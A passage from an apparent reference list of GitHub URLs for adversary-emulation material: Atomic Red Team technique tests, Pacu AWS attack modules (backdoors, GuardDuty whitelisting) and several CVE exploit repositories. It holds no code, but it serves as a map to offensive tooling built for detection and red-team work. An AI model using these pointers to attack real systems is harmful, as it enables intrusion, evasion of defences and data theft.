e2a9/atomics/T1059.002/T1059.002.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.003/T1059.003.md#atomic-test-1---create-and-execute-batch-script\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md#atomic-test-11---get-aduser-enumeration-using-useraccountcontrol-flags-as-rep-roasting\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.003/T1070.003.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.005/T1070.005.md#atomic-test-4---disable-administrative-share-creation-at-startup\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070/T1070.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1071.001/T1071.001.md#atomic-test-2---malicious-user-agents---cmd\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1071.001/T1071.001.md#t1071001---web-protocols\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1072/T1072.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-1---system-information-discovery\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-4---linux-vm-check-via-hardware\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-6---hostname-discovery-windows\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-8---windows-machineguid-discovery\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1083/T1083.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.001/T1087.001.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.002/T1087.002.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1098/T1098.md#atomic-test-1---admin-account-manipulate\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-10---windows---powershell-download\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1105/T1105.md#atomic-test-19---curl-upload-file\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1110.001/T1110.001.md#atomic-test-2---brute-force-credentials-of-single-active-directory-domain-user-via-ldap-against-domain-controller-ntlm-or-kerberos\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1110.002/T1110.002.md#atomic-test-1---password-cracking-with-hashcat\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-1---modify-registry-of-current-user-profile---cmd\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-32---windows-powershell-logging-disabled\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-33---windows-add-registry-value-to-load-service-in-safe-mode-without-network\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-34---windows-add-registry-value-to-load-service-in-safe-mode-with-network\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-4---add-domain-to-trusted-sites-zone\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-5---javascript-in-registry\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-3---x-windows-capture\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-6---windows-screen-capture-copyfromscreen\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1114.001/T1114.001.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1115/T1115.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1120/T1120.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1123/T1123.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1124/T1124.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1133/T1133.md#atomic-test-1---running-chrome-vpn-extensions-via-the-registry-2-vpn-extension\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.001/T1136.001.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.002/T1136.002.md#atomic-test-3---create-a-new-domain-account-using-powershell\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1137.006/T1137.006.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1137/T1137.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1197/T1197.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md#atomic-test-9---enumerate-active-directory-password-policy-with-get-addefaultdomainpasswordpolicy\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1216/T1216.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.001/T1218.001.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.003/T1218.003.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.005/T1218.005.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md#atomic-test-4---infdefaultinstallexe-inf-execution\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-1---teamviewer-files-detected-test-on-windows\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-2---anydesk-files-detected-test-on-windows\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-3---logmein-files-detected-test-on-windows\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-5---screenconnect-application-download-and-install-on-windows\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-6---ammyy-admin-software-execution\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1220/T1220.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md#atomic-test-1---take-ownership-using-takeown-utility\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1482/T1482.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md#atomic-test-2---macoslinux---overwrite-file-with-dd\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1485/T1485.md#atomic-test-3---overwrite-deleted-data-on-c-drive\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1486/T1486.md#atomic-test-5---purelocker-ransom-note\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1489/T1489.md#atomic-test-3---windows---stop-service-by-killing-process\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-5---windows---delete-volume-shadow-copies-via-wmi-with-powershell\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-6---windows---delete-backup-files\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-8---windows---disable-the-sr-scheduled-task\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-9---disable-system-restore-through-registry\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1491.001/T1491.001.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1497.001/T1497.001.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md#atomic-test-2---security-software-discovery---powershell\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518.001/T1518.001.md#atomic-test-5---security-software-discovery---sysmon-service\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1531/T1531.md#atomic-test-3---remove-account-from-domain-admin-group\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1539/T1539.md#atomic-test-1---steal-firefox-cookies-windows\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.002/T1543.002.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md#atomic-test-4---tinyturla-backdoor-service-w64time\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.001/T1546.001.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.003/T1546.003.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.007/T1546.007.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-2---new-shim-database-files-created-in-the-default-shim-database-directory\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-3---registry-key-creation-andor-modification-events-for-sdb\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.013/T1546.013.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.014/T1546.014.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.015/T1546.015.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.015/T1546.015.md#atomic-test-2---powershell-execute-com-object\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.003/T1547.003.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.004/T1547.004.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.004/T1547.004.md#atomic-test-3---winlogon-notify-key-logon-persistence---powershell\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.006/T1547.006.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.010/T1547.010.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.001/T1548.001.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-1---bypass-uac-using-event-viewer-cmd\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-7---bypass-uac-using-sdclt-delegateexecute\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-8---disable-uac-using-regexe\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-9---bypass-uac-using-silentcleanup-task\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.002/T1552.002.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.004/T1552.004.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.006/T1552.006.md#atomic-test-1---gpp-passwords-findstr\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.001/T1553.001.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md#atomic-test-6---add-root-certificate-to-currentuser-certificate-store\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-1---mount-iso-image\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-2---mount-an-iso-image-and-run-executable-from-the-iso\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-3---remove-the-zoneidentifier-alternate-data-stream\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.001/T1555.001.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.003/T1555.003.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.004/T1555.004.md#atomic-test-1---access-saved-credentials-via-vaultcmd\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555/T1555.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1556.002/T1556.002.md#atomic-test-1---install-and-register-password-filter-dll\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1558.003/T1558.003.md#atomic-test-4---request-a-single-ticket-via-powershell\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560/T1560.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-11---uninstall-sysmon\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-26---disable-windows-defender-with-dism\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.002/T1562.002.md#atomic-test-1---disable-windows-iis-http-logging\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-1---disable-microsoft-defender-firewall\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-2---disable-microsoft-defender-firewall-via-registry\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md#atomic-test-3---allow-smb-and-rdp-on-microsoft-defender-firewall\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-3---create-windows-system-file-with-attrib\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-8---hide-files-through-registry\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.002/T1564.002.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.003/T1564.003.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.006/T1564.006.md#atomic-test-3---create-and-start-hyper-v-virtual-machine\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1566.001/T1566.001.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1569.001/T1569.001.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1569.002/T1569.002.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1571/T1571.md#atomic-test-1---testing-usage-of-uncommonly-used-port-with-powershell\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1573/T1573.md#atomic-test-1---openssl-c2\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.006/T1574.006.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.009/T1574.009.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-1---service-registry-permissions-weakness\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-2---service-imagepath-change-with-regexe\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.012/T1574.012.md#atomic-test-3---registry-free-process-scope-cor_profiler\nhttps://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-2---create-local-account-with-admin-privileges---macos\nhttps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-3---create-local-account-with-admin-privileges-using-sysadminctl-utility---macos\nhttps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-5---add-a-newexisting-user-to-the-admin-group-using-dseditgroup-utility---macos\nhttps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md\nhttps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md#atomic-test-12---disable-time-machine\nhttps://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md#atomic-test-24---set-a-firewall-rule-using-new-netfirewallrule\nhttps://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1\nhttps://github.com/RhinoSecurityLabs/Aggressor-Scripts/tree/master/UACBypass\nhttps://github.com/RhinoSecurityLabs/AWS-IAM-Privilege-Escalation\nhttps://github.com/RhinoSecurityLabs/CVEs/blob/15cf4d86c83daa57b59eaa2542a0ed47ad3dc32d/CVE-2024-1212/CVE-2024-1212.py\nhttps://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ec2__startup_shell_script/main.py#L9\nhttps://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ecs__backdoor_task_def/main.py\nhttps://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/guardduty__whitelist_ip/main.py#L9\nhttps://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam__backdoor_users_keys/main.py\nhttps://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/rds__explore_snapshots/main.py\nhttps://github.com/Rhynorater/CVE-2018-15473-Exploit\nhttps://github.com/